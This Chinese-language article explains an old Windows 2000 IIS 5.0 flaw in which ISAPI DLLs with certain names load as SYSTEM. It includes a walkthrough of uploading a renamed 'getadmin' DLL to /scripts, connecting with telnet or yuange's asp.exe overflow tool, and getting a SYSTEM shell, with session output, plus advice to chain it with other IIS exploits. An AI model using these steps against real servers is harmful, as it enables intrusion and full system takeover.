IIS提升权限漏洞

---

IIS4默认情况下，应用程序保护选项是"低（共用IIS进程）"，所以加载isapi的时候是以加载IIS的身份执行。但WIN2K+IIS5.0默认情况下应用程序保护选项是"中（共用的）"，这时IIS加载isapi是用的iwam_computername用户身份执行。
　　但默认情况下WIN2K+IIS5对于一些特殊isapi又要以system身份加载。win2k+iis5 、win2k+iis5+sp1、win2k+iis5+sp2都是简单的判断isapi的文件名，并且没有做目录限制，以SYSTEM权限加载的isapi有：
　　1、 idq.dll
　　2、 httpext.dll
　　3、 httpodbc.dll
　　4、 ssinc.dll
　　5、 msw3prt.dll
　　6、 author.dll
　　7、 admin.dll
　　8、 shtml.dll
　　9、 sspifilt.dll
　　10、compfilt.dll
　　11、pwsdata.dll
　　12、md5filt.dll
　　13、fpexedll.dll
　　所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug，比如请求/scripts/test%81%5cssinc.dll也将会认为是请求的ssinc.dll,就是分离文件路径的时候没有考虑到双字节的远东版问题。ssinc.dll在处理包含文件路径的时候也有一个问题，就是"/"、"\"只识别了一个"/"，所以如果请求里面使用"\"，就会错误的处理包含文件路径，有可能泄露东西或者出现权限漏洞，这种漏洞很多别的地方（ php、asp等）也还存在。
　　但在补了http://www.microsoft.com/technet/security/bulletin/ms01-026.asp 补丁(%25二次解码补丁包，包含在sp3)后，加载这些isapi不是单以文件名做依据了，而是加了路径，应该是修正了此问题。
　　一般默认情况下是：
　　1、 idq.dll d:\winnt\system32\idq.dll
　　2、 httpext.dll d:\winnt\system32\inetsrv\httpext.dll
　　3、 httpodbc.dll d:\winnt\system32\inetsrv\httpodbc.dll
　　4、 ssinc.dll d:\winnt\system32\inrtsrv\ssinc.dll
　　5、 msw3prt.dll d:\winnt\system32\msw3prt.dll
　　6、 author.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\author.dll
　　7、 admin.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\admin.dll
　　8、 shtml.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\shtml.dll
　　9、 sspifilt.dll d:\winnt\system32\inetsrv\sspifilt.dll
　　10、compfilt.dll d:\winnt\system32\inetsrv\compfilt.dll
　　11、pwsdata.dll d:\winnt\system32\inetsrv\pwsdata.dll
　　12、md5filt.dll d:\winnt\system32\inetsrv\md5filt.dll
　　13、fpexedll.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fpexedll.dll
　　正常情况下这些路径都guest不能写,所以应该算已经补上。但如果配置不好，这些路径guest能够写了就一样可以提升权限了
　　
　　
　　win2000的getadmin
　　
　　
　　把此dll上传到IIS的可执行目录，文件名可叫ssinc.dll或者admin.dll等（上面列的13个文件名之一）。然后使用telnet或者原来的asp.exe。
　　
　　1、使用telnet。因为这不是专门的客户端，使用参数"?okok"让通信不加密，如果不带这参数将是乱码。
　　
　　D:\WINNT\temp>telnet 192.168.8.48 80
　　get /scripts/ssinc.dll?okok
　　XORDATAMicrosoft Windows 2000 [Version 5.00.2195]
　　(C) 版权所有 1985-2000 Microsoft Corp.
　　
　　D:\WINNT\system32>whoami
　　whoami
　　NT AUTHORITY\SYSTEM
　　D:\WINNT\system32>
　　
　　2、使用asp.exe。同样支持iisput、iisget、iiscmd等命令。
　　E:\work\asp\Debug>asp 192.168.8.48 /scripts/ssinc.dll
　　
　　IIS4.0 OVERFLOW PROGRAM 2.0 .
　　copy by yuange 2000.6.2.
　　welcome to my homepagehttp://yuange.yeah.net .
　　welcome tohttp://www.nsfocus.com .
　　usage: asp [aspfile] [webport] [offset]
　　
　　nuke ip: 192.168.8.48 port 80
　　offset:0
　　
　　shellcode long 0x143c
　　
　　packetlong:0x1003c
　　
　　send packet 65634 bytes.
　　recv:
　　TRACK / HTTP/1.1
　　HOST:192.168.8.48
　　
　　ok!recv 8 bytes
　　
　　recv:XORDATAMicrosoft Windows 2000 [Version 5.00.2195]
　　(C) 版权所有 1985-2000 Microsoft Corp.
　　
　　D:\WINNT\system32>whoami
　　whoami
　　NT AUTHORITY\SYSTEM
　　
　　对于IIS4默认情况下加载ISAPI的DLL都是SYSTEM权限，要得到SYSTEM权限那就根本不是问题。但IIS5默认不是，就需要利用这个提升权限漏洞。这个漏洞照现在公布的，需要有个可写目录供上传利用的dll，因为UNICODE漏洞所以不一定要在虚拟目录，不过默认情况下虚拟可执行目录/scripts可写。
　　其实结合别的漏洞，根本不需要可写目录，不需要上传DLL,可以利用IIS自身带的一些DLL，利用UNICODE、利用溢出，利用再一个漏洞、加上这个提升权限的漏洞，那就可以一步到位，直接得到system权限。
　　
　　WINDOWS、IIS等漏洞太多，现在利用IIS漏洞都是玩组合了。像上面说的实际应用中就可以一下利用我们发现的unicode、fpse扩展溢出、截断、提升权限漏洞4个大漏洞 本文作者:

---

« 
» 

---